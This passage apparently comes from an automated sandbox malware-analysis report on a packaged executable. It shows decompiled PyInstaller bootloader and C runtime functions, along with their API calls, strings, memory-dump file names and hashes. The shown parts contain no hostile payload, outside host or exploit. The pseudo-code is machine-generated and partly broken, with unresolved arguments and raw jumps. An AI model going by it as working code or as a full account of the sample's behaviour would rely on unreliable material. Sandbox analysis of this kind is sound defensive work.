				r8d = 0;
				E00007FF77FF7DA8D79A0(_t73, _t73, _t119, _t122, _t122, _t130);
				E00007FF77FF7DA8E6604(0, _t73, _t73, _t73);
				E00007FF77FF7DA8E3FEC(0, _t73, _t73, _t130);
				E00007FF77FF7DA8E3FEC(0, _t73, _t73, _t130);
				goto 0xda8d693e;
				SetEnvironmentVariableW(??, ??);
				E00007FF77FF7DA8E3FEC(0, _t73, _t73, _t130);
				return E00007FF77FF7DA8DACF0(1, 0, _a8248 ^ _t127);
			}

0x7ff7da8d6760
0x7ff7da8d6760
0x7ff7da8d6760
0x7ff7da8d6760
0x7ff7da8d6765
0x7ff7da8d6773
0x7ff7da8d6778
0x7ff7da8d677b
0x7ff7da8d6782
0x7ff7da8d6785
0x7ff7da8d678d
0x7ff7da8d6790
0x7ff7da8d6796
0x7ff7da8d679f
0x7ff7da8d67aa
0x7ff7da8d67b5
0x7ff7da8d67c5
0x7ff7da8d67cf
0x7ff7da8d67d6
0x7ff7da8d67df
0x7ff7da8d67e6
0x7ff7da8d67eb
0x7ff7da8d67fa
0x7ff7da8d6800
0x7ff7da8d6805
0x7ff7da8d6808
0x7ff7da8d6819
0x7ff7da8d682a
0x7ff7da8d683c
0x7ff7da8d6845
0x7ff7da8d684f
0x7ff7da8d6854
0x7ff7da8d6856
0x7ff7da8d6862
0x7ff7da8d686a
0x7ff7da8d686c
0x7ff7da8d6874
0x7ff7da8d6877
0x7ff7da8d6885
0x7ff7da8d688d
0x7ff7da8d6895
0x7ff7da8d689d
0x7ff7da8d68a4
0x7ff7da8d68b1
0x7ff7da8d68ba
0x7ff7da8d68c1
0x7ff7da8d68c6
0x7ff7da8d68d2
0x7ff7da8d68da
0x7ff7da8d68e2
0x7ff7da8d68e4
0x7ff7da8d68f0
0x7ff7da8d68f8
0x7ff7da8d68fa
0x7ff7da8d6905
0x7ff7da8d6913
0x7ff7da8d691b
0x7ff7da8d6923
0x7ff7da8d692b
0x7ff7da8d6935
0x7ff7da8d693e
0x7ff7da8d696f

APIs

GetTempPathW.KERNEL32(?,00000000,?,00007FF7DA8D672D), ref: 00007FF7DA8D67FA

Part of subcall function 00007FF7DA8D6970: GetEnvironmentVariableW.KERNEL32(00007FF7DA8D36C7), ref: 00007FF7DA8D69AA
Part of subcall function 00007FF7DA8D6970: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7DA8D69C7

Part of subcall function 00007FF7DA8E6604: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E661D

SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF7DA8D68B1

Part of subcall function 00007FF7DA8D2770: MessageBoxW.USER32 ref: 00007FF7DA8D2841

Strings

TMP, xrefs: 00007FF7DA8D6798, 00007FF7DA8D6859, 00007FF7DA8D68E7
TMP, xrefs: 00007FF7DA8D67BE
_MEI%d, xrefs: 00007FF7DA8D6808
LOADER: Failed to set the TMP environment variable., xrefs: 00007FF7DA8D67D8

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
API String ID: 3752271684-1116378104
Opcode ID: c23b2c0ee13ef41eab717089866ee2a8f4c2c24d62db4c1be4aa042c79d56fb5
Instruction ID: 5bb38dbb4551eec1dfa33633dc302df26c42e671ab7f9b32d310b4fd9fc8495f
Opcode Fuzzy Hash: c23b2c0ee13ef41eab717089866ee2a8f4c2c24d62db4c1be4aa042c79d56fb5
Instruction Fuzzy Hash: A351AE11F2964788FE56B72299152BED251BF99BD0FC800B3ED0E47797EE2DE5218320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DB5FC Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7DA8DB618
RtlCaptureContext.KERNEL32 ref: 00007FF7DA8DB645
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7DA8DB65F
RtlVirtualUnwind.KERNEL32 ref: 00007FF7DA8DB6A0
IsDebuggerPresent.KERNEL32 ref: 00007FF7DA8DB6F4
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7DA8DB715
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7DA8DB720

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: dd2dcb170d6567bc53123a0d73701bc7f87a75e011af16bca6432f566aef9732
Instruction ID: 0650c1f7b5603d4fb26fce2de871b29d64dc747542ea88c3f944cf97d4b79e62
Opcode Fuzzy Hash: dd2dcb170d6567bc53123a0d73701bc7f87a75e011af16bca6432f566aef9732
Instruction Fuzzy Hash: C1315272608B828AFF61AF60E8403EDB364FB94754F84443ADA8E47795DF38D558C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E9A34 Relevance: 9.1, APIs: 6, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00007FF77FF7DA8E9A34(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
				void* _t36;
				int _t38;
				signed long long _t60;
				long long _t63;
				_Unknown_base(*)()* _t82;
				void* _t86;
				void* _t87;
				void* _t89;
				signed long long _t90;
				struct _EXCEPTION_POINTERS* _t95;

				 *((long long*)(_t89 + 0x10)) = __rbx;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t87 = _t89 - 0x4f0;
				_t90 = _t89 - 0x5f0;
				_t60 =  *0xda90d008; // 0xe3add53f52b8
				 *(_t87 + 0x4e0) = _t60 ^ _t90;
				if (__ecx == 0xffffffff) goto 0xda8e9a73;
				E00007FF77FF7DA8DB5F4(_t36);
				r8d = 0x98;
				E00007FF77FF7DA8DC170();
				r8d = 0x4d0;
				E00007FF77FF7DA8DC170();
				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
				_t63 = _t87 + 0x10;
				 *((long long*)(_t90 + 0x50)) = _t63;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t63 == 0) goto 0xda8e9b06;
				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
				_t38 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t82, _t86);
				if (UnhandledExceptionFilter(_t95) != 0) goto 0xda8e9b68;
				if (_t38 != 0) goto 0xda8e9b68;
				if (__ecx == 0xffffffff) goto 0xda8e9b68;
				return E00007FF77FF7DA8DACF0(E00007FF77FF7DA8DB5F4(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
			}

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7DA8E9AAD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7DA8E9AC5
RtlVirtualUnwind.KERNEL32 ref: 00007FF7DA8E9B00
IsDebuggerPresent.KERNEL32 ref: 00007FF7DA8E9B39
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7DA8E9B43
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7DA8E9B4E

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: d01ddf7f56426acea5c43d672f80e072ef38b87dfc08171ccb6652c2c2b7d2bb
Instruction ID: f892264354e35f347c456d6c076da8cf8f48b20e22286567647a480b81df883c
Opcode Fuzzy Hash: d01ddf7f56426acea5c43d672f80e072ef38b87dfc08171ccb6652c2c2b7d2bb
Instruction Fuzzy Hash: 15317132608B8285EB219B25E8402ADB3A4FB98754F940536EE9D43B96DF3CD555CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F0904 Relevance: 7.8, APIs: 5, Instructions: 282
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00007FF77FF7DA8F0904(void* __ecx, long long __rbx, intOrPtr* __rcx, void** __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r15;
				signed int _t70;
				void* _t77;
				signed int _t96;
				void* _t109;
				void* _t113;
				signed long long _t140;
				signed long long _t141;
				intOrPtr _t142;
				signed short* _t143;
				intOrPtr* _t145;
				void* _t146;
				intOrPtr* _t154;
				intOrPtr* _t156;
				intOrPtr* _t159;
				long long _t160;
				intOrPtr* _t161;
				signed short* _t167;
				signed short* _t168;
				signed long long _t180;
				signed long long _t182;
				long long _t186;
				signed long long _t202;
				void* _t207;
				intOrPtr* _t211;
				intOrPtr* _t212;
				void* _t214;
				intOrPtr _t220;
				void* _t222;
				void* _t223;
				void* _t225;
				signed long long _t226;
				void* _t228;
				void* _t239;
				signed long long _t240;
				long long _t241;
				void* _t244;
				union _FINDEX_INFO_LEVELS _t249;
				signed short* _t250;
				signed long long _t254;
				intOrPtr* _t255;
				WCHAR* _t258;
				signed long long _t260;

				 *((long long*)(_t225 + 0x18)) = __rbx;
				_t223 = _t225 - 0x1c0;
				_t226 = _t225 - 0x2c0;
				_t140 =  *0xda90d008; // 0xe3add53f52b8
				_t141 = _t140 ^ _t226;
				 *(_t223 + 0x1b8) = _t141;
				r12d = 0;
				 *((long long*)(_t226 + 0x50)) = __rdx;
				if (__rdx != 0) goto 0xda8f095c;
				E00007FF77FF7DA8E4394(_t141);
				_t5 = _t239 + 0x16; // 0x16
				 *_t141 = _t5;
				E00007FF77FF7DA8E9D00();
				goto 0xda8f0cb4;
				asm("xorps xmm0, xmm0");
				 *__rdx = _t239;
				_t142 =  *((intOrPtr*)(__rcx));
				asm("movdqu [esp+0x30], xmm0");
				 *(_t226 + 0x40) = _t239;
				if (_t142 == 0) goto 0xda8f0b8c;
				 *((intOrPtr*)(_t223 + 0x1b0)) = 0x3f002a;
				 *((intOrPtr*)(_t223 + 0x1b4)) = r12w;
				E00007FF77FF7DA8EE550(_t142, _t223 + 0x1b0);
				_t250 =  *((intOrPtr*)(__rcx));
				if (_t142 != 0) goto 0xda8f09e4;
				r8d = 0;
				_t167 = _t250;
				if (E00007FF77FF7DA8F0CF4(0x801, _t167, _t223 + 0x1b0,  *((intOrPtr*)(_t226 + 0x38)), _t228, _t226 + 0x30) != 0) goto 0xda8f0b35;
				goto 0xda8f0b29;
				if (_t142 == _t250) goto 0xda8f0a08;
				_t109 = ( *_t167 & 0x0000ffff) - 0x2f - 0x2d;
				if (_t109 > 0) goto 0xda8f09ff;
				asm("dec eax");
				if (_t109 < 0) goto 0xda8f0a08;
				_t168 = _t167 - 2;
				if (_t168 != _t250) goto 0xda8f09e9;
				_t96 =  *_t168 & 0x0000ffff;
				if (_t96 != 0x3a) goto 0xda8f0a1a;
				_t143 =  &(_t250[1]);
				if (_t168 != _t143) goto 0xda8f0a69;
				_t113 = _t96 - 0x2f - 0x2d;
				if (_t113 > 0) goto 0xda8f0a2f;
				asm("dec eax");
				if (_t113 < 0) goto 0xda8f0a32;
				 *((intOrPtr*)(_t226 + 0x28)) = r12d;
				 *(_t226 + 0x20) = _t239;
				asm("dec ebp");
				r9d = 0;
				FindFirstFileExW(_t258, _t249, _t244);
				if (_t143 != 0xffffffff) goto 0xda8f0a95;
				if (E00007FF77FF7DA8F0CF4(_t143, _t250, _t239,  *((intOrPtr*)(_t226 + 0x38)), _t239, _t226 + 0x30) != 0) goto 0xda8f0b64;
				goto 0xda8f0b29;
				_t240 =  *((intOrPtr*)(_t226 + 0x38)) -  *((intOrPtr*)(_t226 + 0x30)) >> 3;
				if ( *((short*)(_t223 - 0x74)) != 0x2e) goto 0xda8f0abd;
				_t70 =  *(_t223 - 0x72) & 0x0000ffff;
				if (_t70 == 0) goto 0xda8f0adb;
				if (_t70 != 0x2e) goto 0xda8f0abd;
				if ( *((intOrPtr*)(_t223 - 0x70)) == 0) goto 0xda8f0adb;
				if (E00007FF77FF7DA8F0CF4(_t143, _t223 - 0x74, _t250,  *((intOrPtr*)(_t226 + 0x38)) -  *((intOrPtr*)(_t226 + 0x30)) >> 3, _t244 & (_t168 - _t250 >> 0x00000001) + 0x00000001, _t226 + 0x30) != 0) goto 0xda8f0b5b;
				if (FindNextFileW(_t239) != 0) goto 0xda8f0aa1;
				_t220 =  *((intOrPtr*)(_t226 + 0x38));
				_t211 =  *((intOrPtr*)(_t226 + 0x30));
				if (_t240 == _t220 - _t211 >> 3) goto 0xda8f0b1d;
				_t33 =  &(_t143[4]); // 0x8
				r8d = _t33;
				E00007FF77FF7DA8F6710(_t143, _t211 + _t240 * 8, (_t220 - _t211 >> 3) - _t240, _t211, _t220, _t223, _t244 & (_t168 - _t250 >> 0x00000001) + 0x00000001, 0x7ff7da8f08f0, __rcx);
				FindClose(_t207);
				r12d = 0;
				_t260 = __rcx + 8;
				goto 0xda8f097a;
				_t154 = _t211;
				if (_t211 ==  *((intOrPtr*)(_t226 + 0x38))) goto 0xda8f0c07;
				E00007FF77FF7DA8E9D68( *_t260,  *_t154);
				if (_t154 + 8 !=  *((intOrPtr*)(_t226 + 0x38))) goto 0xda8f0b43;
				goto 0xda8f0c07;
				FindClose(_t214);
				_t212 =  *((intOrPtr*)(_t226 + 0x30));
				_t156 = _t212;
				if (_t212 ==  *((intOrPtr*)(_t226 + 0x38))) goto 0xda8f0c07;
				_t180 =  *_t156;
				_t77 = E00007FF77FF7DA8E9D68( *_t260, _t180);
				if (_t156 + 8 !=  *((intOrPtr*)(_t226 + 0x38))) goto 0xda8f0b77;
				goto 0xda8f0c07;
				_t202 = _t240;
				 *(_t226 + 0x48) = _t202;
				_t145 = _t212;
				_t254 = (_t220 - _t212 >> 3) + 1;
				if (_t212 == _t220) goto 0xda8f0bce;
				_t182 = (_t180 | 0xffffffff) + 1;
				if ( *((intOrPtr*)( *_t145 + _t182 * 2)) != r12w) goto 0xda8f0bb0;
				_t146 = _t145 + 8;
				if (_t146 != _t220) goto 0xda8f0ba9;
				 *(_t226 + 0x48) = _t202 + 1 + _t182;
				r8d = 2;
				E00007FF77FF7DA8E7D5C(_t77, _t254, _t202 + 1 + _t182, _t244 & (_t168 - _t250 >> 0x00000001) + 0x00000001);
				if (_t146 != 0) goto 0xda8f0c16;
				E00007FF77FF7DA8E9D68(_t146, _t254);
				_t159 = _t212;
				if (_t212 == _t220) goto 0xda8f0c04;
				E00007FF77FF7DA8E9D68(_t146,  *_t159);
				_t160 = _t159 + 8;
				if (_t160 != _t220) goto 0xda8f0bf3;
				E00007FF77FF7DA8E9D68(_t146, _t212);
				goto 0xda8f0cb4;
				_t186 = _t146 + _t254 * 8;
				_t255 = _t212;
				 *((long long*)(_t223 + 0x1b0)) = _t186;
				_t241 = _t186;
				if (_t212 == _t220) goto 0xda8f0c82;
				if ( *((intOrPtr*)( *_t255 + ((_t260 | 0xffffffff) + 1) * 2)) != 0) goto 0xda8f0c3b;
				if (E00007FF77FF7DA8F07F0(_t241 - _t186 >> 1, _t160, _t241,  *(_t226 + 0x48) - (_t241 - _t186 >> 1), _t220,  *_t255, (_t260 | 0xffffffff) + 2, _t222) != 0) goto 0xda8f0cde;
				 *((long long*)(_t255 + _t160 - _t212)) = _t241;
				if (_t255 + 8 != _t220) goto 0xda8f0c32;
				 *((long long*)( *((intOrPtr*)(_t226 + 0x50)))) = _t160;
				E00007FF77FF7DA8E9D68( *((intOrPtr*)(_t226 + 0x50)),  *((intOrPtr*)(_t223 + 0x1b0)));
				_t161 = _t212;
				if (_t212 == _t220) goto 0xda8f0caa;
				E00007FF77FF7DA8E9D68( *((intOrPtr*)(_t226 + 0x50)),  *_t161);
				if (_t161 + 8 != _t220) goto 0xda8f0c99;
				E00007FF77FF7DA8E9D68( *((intOrPtr*)(_t226 + 0x50)), _t212);
				return E00007FF77FF7DA8DACF0(0, 0,  *(_t223 + 0x1b8) ^ _t226);
			}

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F0950
FindFirstFileExW.KERNEL32 ref: 00007FF7DA8F0A5A

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 666c74e6fffe6e96b510908b2bfde1f57f826ae5c607955d2696b43aa9f9a94b
Instruction ID: 23ec20a17a69d60756a2ee8a346ba36e0ee37697c53d99839a55494ef236c7de
Opcode Fuzzy Hash: 666c74e6fffe6e96b510908b2bfde1f57f826ae5c607955d2696b43aa9f9a94b
Instruction Fuzzy Hash: BBB1D422B186D785FA62AB2194001BDE760FB64BE4FC44173ED5D47B8AEE3CE561C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD8622E8 Relevance: 6.4, APIs: 5, Instructions: 140COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FFCFDA037DB
memset.VCRUNTIME140 ref: 00007FFCFDA037F2
memmove.VCRUNTIME140 ref: 00007FFCFDA03819
memset.VCRUNTIME140 ref: 00007FFCFDA03826
memmove.VCRUNTIME140 ref: 00007FFCFDA0385A

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: memmove$memset
String ID:
API String ID: 3790616698-0
Opcode ID: 51b66f021cd6887e2f3166c0257dd0c7f3025c7e02eaaa6dc68159711c9c4620
Instruction ID: 955800baa97e39536f9f3d2d3eaee3f768d0b8853d4097c09fe32c6ae4df4b57
Opcode Fuzzy Hash: 51b66f021cd6887e2f3166c0257dd0c7f3025c7e02eaaa6dc68159711c9c4620
Instruction Fuzzy Hash: C051EF2271CB9A86DB10DB12E45026AABA4FB89BD4F845135EEAD037D6EE3CD104C764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D3DD0 Relevance: 291.0, APIs: 55, Strings: 111, Instructions: 457
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00007FF77FF7DA8D3DD0(void* __edx, long long __rax, struct HINSTANCE__* __rbx, void* __rcx, void* _a8) {
				void* _t20;
				void* _t21;

				GetProcAddress(__rbx);
				 *0xda90dca8 = __rax;
				if (__rax != 0) goto 0xda8d3e1b;
				E00007FF77FF7DA8D2620(__rax, __rax, "GetProcAddress", "Failed to get address for Py_DontWriteBytecodeFlag\n", _t20, _t21);
				return 0xffffffff;
			}

0x7ff7da8d3de6
0x7ff7da8d3dec
0x7ff7da8d3df6
0x7ff7da8d3e06
0x7ff7da8d3e1a

APIs

GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3DE6
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3E25
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3E4A
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3E6F
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3E97
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3EBF
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3EE7
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3F0F
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3F37

Strings

Failed to get address for Py_BuildValue, xrefs: 00007FF7DA8D3FA1
Failed to get address for PyUnicode_Decode, xrefs: 00007FF7DA8D45E1
PyObject_GetAttrString, xrefs: 00007FF7DA8D4395
Py_GetPath, xrefs: 00007FF7DA8D4075
Failed to get address for Py_FileSystemDefaultEncoding, xrefs: 00007FF7DA8D3E37
PyUnicode_FromFormat, xrefs: 00007FF7DA8D459D
PySys_AddWarnOption, xrefs: 00007FF7DA8D440D
PyErr_Occurred, xrefs: 00007FF7DA8D413D
Failed to get address for PySys_SetObject, xrefs: 00007FF7DA8D44A1
PyUnicode_Replace, xrefs: 00007FF7DA8D4665
Py_Initialize, xrefs: 00007FF7DA8D4025
Failed to get address for Py_IgnoreEnvironmentFlag, xrefs: 00007FF7DA8D3E81
PyErr_Clear, xrefs: 00007FF7DA8D4115
Failed to get address for PyObject_GetAttrString, xrefs: 00007FF7DA8D43B1
Failed to get address for PyDict_GetItemString, xrefs: 00007FF7DA8D4109
Py_NoUserSiteDirectory, xrefs: 00007FF7DA8D3EB5
PySys_SetArgvEx, xrefs: 00007FF7DA8D4435
Failed to get address for PyErr_Clear, xrefs: 00007FF7DA8D4131
Failed to get address for Py_NoSiteFlag, xrefs: 00007FF7DA8D3EA9
Py_FileSystemDefaultEncoding, xrefs: 00007FF7DA8D3E1B
Failed to get address for PyUnicode_FromString, xrefs: 00007FF7DA8D4541
Failed to get address for PyMarshal_ReadObjectFromString, xrefs: 00007FF7DA8D4519
Failed to get address for PyErr_Print, xrefs: 00007FF7DA8D4181
Py_VerboseFlag, xrefs: 00007FF7DA8D3F05
PyErr_NormalizeException, xrefs: 00007FF7DA8D41DD
Failed to get address for PyImport_AddModule, xrefs: 00007FF7DA8D4221
PyModule_GetDict, xrefs: 00007FF7DA8D42F5
Failed to get address for PyEval_EvalCode, xrefs: 00007FF7DA8D44F1
Py_FrozenFlag, xrefs: 00007FF7DA8D3E40
Failed to get address for PyUnicode_AsUTF8, xrefs: 00007FF7DA8D4631
Failed to get address for PySys_SetPath, xrefs: 00007FF7DA8D44C9
Failed to get address for PyErr_Fetch, xrefs: 00007FF7DA8D41A9
Failed to get address for Py_FrozenFlag, xrefs: 00007FF7DA8D3E5C
Failed to get address for PyRun_SimpleStringFlags, xrefs: 00007FF7DA8D4401
Failed to get address for PyErr_Occurred, xrefs: 00007FF7DA8D4159
Failed to get address for PyList_New, xrefs: 00007FF7DA8D42C1
Failed to get address for PyMem_RawFree, xrefs: 00007FF7DA8D4591
Py_SetPath, xrefs: 00007FF7DA8D404D
Failed to get address for Py_SetPythonHome, xrefs: 00007FF7DA8D40E1
PyMarshal_ReadObjectFromString, xrefs: 00007FF7DA8D44FD
Failed to get address for Py_IncRef, xrefs: 00007FF7DA8D4019
Failed to get address for PyObject_Str, xrefs: 00007FF7DA8D43D9
Failed to get address for PyUnicode_Replace, xrefs: 00007FF7DA8D4681
Failed to get address for PyObject_CallFunction, xrefs: 00007FF7DA8D4339
Py_DecRef, xrefs: 00007FF7DA8D3FAD
PyErr_Print, xrefs: 00007FF7DA8D4165
PySys_SetPath, xrefs: 00007FF7DA8D44AD
Failed to get address for Py_UTF8Mode, xrefs: 00007FF7DA8D3F79
PyErr_Fetch, xrefs: 00007FF7DA8D418D
PyImport_AddModule, xrefs: 00007FF7DA8D4205
PyRun_SimpleStringFlags, xrefs: 00007FF7DA8D43E5
Failed to get address for PyErr_NormalizeException, xrefs: 00007FF7DA8D41F9
PyObject_SetAttrString, xrefs: 00007FF7DA8D436D
Failed to get address for PyObject_CallFunctionObjArgs, xrefs: 00007FF7DA8D4361
Failed to get address for Py_SetProgramName, xrefs: 00007FF7DA8D40B9
Failed to get address for Py_SetPath, xrefs: 00007FF7DA8D4069
Failed to get address for Py_DecodeLocale, xrefs: 00007FF7DA8D4569
Failed to get address for PySys_GetObject, xrefs: 00007FF7DA8D4479
Py_NoSiteFlag, xrefs: 00007FF7DA8D3E8D
Failed to get address for PyUnicode_FromFormat, xrefs: 00007FF7DA8D45B9
Failed to get address for PyUnicode_DecodeFSDefault, xrefs: 00007FF7DA8D4609
Failed to get address for Py_VerboseFlag, xrefs: 00007FF7DA8D3F21
